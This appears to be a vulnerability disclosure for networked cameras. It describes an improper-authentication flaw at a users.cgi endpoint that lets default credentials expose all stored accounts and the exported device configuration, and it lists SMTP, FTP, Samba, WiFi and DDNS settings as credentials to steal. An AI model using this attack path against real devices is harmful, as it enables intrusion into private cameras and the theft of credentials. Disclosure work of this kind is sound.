Description: (Get credentials with improper authentication and access all config settings from devices)
Several models have a security failure in the endpoint users.cgi?action=getUsers,
The parameter has an improper authentication failure,
it is possible to use 2 default credentials to directly access all the credentials
of the database through the vulnerable endpoint,
We can check the access in the exporting the configuration file of Device.
Config File Export
IPFilterSetting.permissionType (Permissions Type)
IPFilterSetting.allowList.filterEntry0.enabled (Enable Withelist of ip Filtering)
Impact:
- get improper access to private cameras
- steal smtp credentials
EmailSetting.attachedSnapShotEnabled=0
EmailSetting.attachedVideoClipEnabled=0
EmailSetting.attachedVideoURLEnabled=1
EmailSetting.receiverAddress1=
EmailSetting.receiverAddress2=
EmailSetting.senderAddress=
EmailSetting.senderName=
EmailSetting.subject=
EmailSetting.primary.accountName=
EmailSetting.primary.authenticationMode=1
EmailSetting.primary.password=
EmailSetting.primary.portNo=25
EmailSetting.primary.smtpServerHostName=
- Steal FTP credentials (
remote server->save records)
FTPSetting.uploadSnapShotEnabled=0
FTPSetting.uploadVideoClipEnabled=0
FTPSetting.primary.accountName=
FTPSetting.primary.addressType=0
FTPSetting.primary.hostname=
FTPSetting.primary.ipAddress=
FTPSetting.primary.ipv6Address=
FTPSetting.primary.passiveModeEnabled=0
FTPSetting.primary.password=
FTPSetting.primary.portNo=21
FTPSetting.primary.ShareDIR=
- Get Samba Credentials
Samba.addressType=0
Samba.hostDns=
Samba.ipAddress=
Samba.ipv6Address=
Samba.password=guest
Samba.preserve=
Samba.userName=guest
Samba.shareDIR=
Samba.workGroup=
Samba.SambaSnapShotEnabled=0
Samba.SambaVideoClipEnabled=1
- Basic Network Settings (Discovery ranges of ips and SubMask's)
BasicNetworkSetting.addressType=0
BasicNetworkSetting.dnsAddress1=80.58.61.250
BasicNetworkSetting.dnsAddress2=80.58.61.254
BasicNetworkSetting.gatewayAddress=192.168.1.1
BasicNetworkSetting.ipv4Address=192.168.1.53
BasicNetworkSetting.ipv4Address2nd=192.168.1.245
BasicNetworkSetting.subnetMask=255.255.255.0
BasicNetworkSetting.subnetMask2nd=255.255.255.0
BasicNetworkSetting.enabledIP2nd=0
BasicNetworkSetting.pppoe.password=
BasicNetworkSetting.pppoe.username=
BasicNetworkSetting.defaultgatewayType=0
BasicNetworkSetting.manualDns=0
BasicNetworkSetting.tcp_mss_option=0
BasicNetworkSetting.tcp_mss_value=1500
- Wifi Settings
WIFISetting.wifibridge=1
WIFISetting.wlNetworkSetting.wifiaddressType=1
WIFISetting.wlNetworkSetting.wifiipv4Address=
WIFISetting.wlNetworkSetting.wifisubnetMask=
WIFISetting.wlNetworkSetting.wifigatewayAddress=
WIFISetting.wlNetworkSetting.wifidnsAddress1=
WIFISetting.wlNetworkSetting.wifidnsAddress2=
WIFISetting.wlNetworkSetting.wifipppoe.username=
WIFISetting.wlNetworkSetting.wifipppoe.password=
- Discovery on Internet Settings
DiscoveryonInternetSetting.enabled=1
DiscoveryonInternetSetting.upnp_status=0
DiscoveryonInternetSetting.register_status=0
DiscoveryonInternetSetting.online=0
DiscoveryonInternetSetting.check=0
DiscoveryonInternetSetting.checkname=0
DiscoveryonInternetSetting.update=0
DiscoveryonInternetSetting.RefreshTime=60
DiscoveryonInternetSetting.RefreshTimeList=1 5 30 60 180 360 1440
DiscoveryonInternetSetting.weburl=
DiscoveryonInternetSetting.username=
DiscoveryonInternetSetting.discovery_check_status=0
DiscoveryonInternetSetting.type=0
DiscoveryonInternetSetting.http_port=80
DiscoveryonInternetSetting.rtsp_port=554
DiscoveryonInternetSetting.publicip=
DiscoveryonInternetSetting.username_backup=
DiscoveryonInternetSetting.wanip_backup=
DiscoveryonInternetSetting.macaddr_backup=
DiscoveryonInternetSetting.port_backup=
DiscoveryonInternetSetting.localip_backup=
DiscoveryonInternetSetting.https_backup=
DiscoveryonInternetSetting.httpport_backup=
- DDNS Settings
DDNSSetting.dyndnsEnabled=0
DDNSSetting.dyndns.wildcardEnabled=0
DDNSSetting.dyndns.username=
DDNSSetting.dyndns.password=
DDNSSetting.dyndns.hostname=
DDNSSetting.tzodnsEnabled=0
DDNSSetting.tzodns.wildcardEnabled=0
DDNSSetting.tzodns.username=
DDNSSetting.tzodns.password=
DDNSSetting.tzodns.hostname=
DDNSSetting.noipdnsEnabled=0
DDNSSetting.noipdns.wildcardEnabled=0
DDNSSetting.noipdns.username=
DDNSSetting.noipdns.password=
DDNSSetting.noipdns.hostname=
DDNSSetting.noipdns=1
DDNSSetting.tzolastip=
DDNSSetting.ddns_last_ipaddr=192.168.1.1
DDNSSetting.nameserver=168.95.1.1
- Get all cameras in CCTV Center with
MultiCameraSetSetting.cameraList(view in export config file)
